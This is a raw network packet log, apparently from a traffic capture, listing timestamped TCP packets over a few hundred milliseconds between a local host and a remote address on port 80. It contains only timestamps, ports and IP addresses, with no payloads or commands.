Jan 7, 2025 10:08:21.768912077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768923998 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768938065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768949986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768955946 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.768973112 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.769018888 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.769018888 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.769031048 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.769548893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.769558907 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.769570112 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.769579887 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.769746065 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.769846916 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.769856930 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.769866943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.769933939 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.769933939 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.769958973 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.769969940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770085096 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.770131111 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770164967 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770178080 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770270109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770279884 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770287991 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770298958 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770324945 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.770374060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770384073 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770399094 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.770417929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770431042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770440102 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770442963 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.770484924 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.770484924 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.770509958 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770519972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770529985 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770539999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770555019 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770565987 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770576000 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770576954 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.770587921 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.770589113 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.770613909 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.770688057 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.819233894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.819248915 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.819259882 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.819691896 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.866204977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.866216898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.866221905 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.868068933 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.892266035 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892278910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892288923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892294884 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892317057 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892384052 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892399073 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892426014 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892430067 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892435074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892465115 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.892503023 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892514944 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892534018 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.892636061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892647028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892657042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892664909 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.892668962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892684937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892694950 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892707109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892718077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892726898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.892726898 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.892726898 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.892726898 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.892776012 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893023014 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893068075 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893078089 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893121958 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893131971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893140078 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893140078 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893192053 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893203974 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893235922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893244982 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893254042 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893259048 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893275023 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893435001 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893444061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893452883 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893464088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893472910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893482924 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893491983 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893501997 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893513918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893522978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893532991 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893543005 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893543959 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893543959 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893553972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893563986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893577099 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893640041 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893651009 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893663883 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893668890 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893672943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893682957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893697023 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893709898 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893728018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893738985 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893748999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893759012 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893835068 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893845081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893857002 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893882990 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893893957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.893909931 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.893944979 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894028902 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894038916 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894049883 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894058943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894069910 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894078970 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894109011 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894109011 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894175053 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894191027 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894205093 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894212961 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894221067 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894222021 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894233942 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894253969 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894253969 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894279003 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894361973 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894371033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894382000 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894409895 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894426107 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894676924 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894686937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894696951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894706011 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894723892 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894723892 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894767046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894776106 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894784927 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894795895 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894882917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894892931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894901991 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894908905 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894932032 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894942999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894942999 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894942999 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.894989967 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.894999981 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895015001 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.895059109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895085096 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.895092964 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895102978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895149946 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895159960 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895179033 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.895242929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895260096 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895267963 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.895354986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895364046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895382881 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895391941 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.895397902 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895407915 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895416975 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.895421028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895431995 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.895445108 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.895724058 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.944183111 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.944263935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.944273949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.944278955 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.944422960 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:21.991123915 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.991143942 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.991152048 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:21.991195917 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017316103 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017342091 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017354012 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017364025 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017376900 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017417908 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017441988 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017455101 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017460108 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017520905 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017539024 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017548084 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017549992 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017582893 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017618895 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017628908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017642021 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017695904 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017705917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017715931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017724991 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017760038 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017766953 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017779112 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017819881 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017828941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017843962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017847061 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017858982 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017860889 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017870903 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017880917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017904043 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017904997 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017915010 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017950058 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017963886 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017973900 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.017987013 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.017996073 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018003941 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018017054 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018027067 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018038034 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018059969 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018090010 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018120050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018137932 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018148899 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018158913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018259048 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018296957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018309116 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018317938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018327951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018337965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018349886 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018471003 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018482924 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018491983 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018506050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018506050 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018517017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018527985 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018541098 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018583059 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018593073 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018601894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018611908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018627882 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018685102 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018692017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018702984 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018723965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018748045 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018816948 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018827915 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018837929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018840075 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018848896 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018872976 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018894911 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018912077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018919945 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.018920898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.018997908 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019007921 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019009113 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.019028902 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019037962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019047976 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019056082 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.019088030 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.019104004 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019125938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019134045 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019164085 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.019190073 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019200087 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019212008 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019233942 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.019275904 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.019418001 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019428968 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019438982 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019460917 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.019546986 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019583941 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.019610882 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019620895 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019668102 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.019670010 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019680977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019721985 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.019814014 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019823074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019843102 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019893885 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.019917011 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019931078 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019949913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.019975901 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.020005941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.020015955 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.020025015 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.020030975 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.020045996 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:22.020060062 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:22.020071030 CET	80	49884	185.215.113.16	192.168.2.4
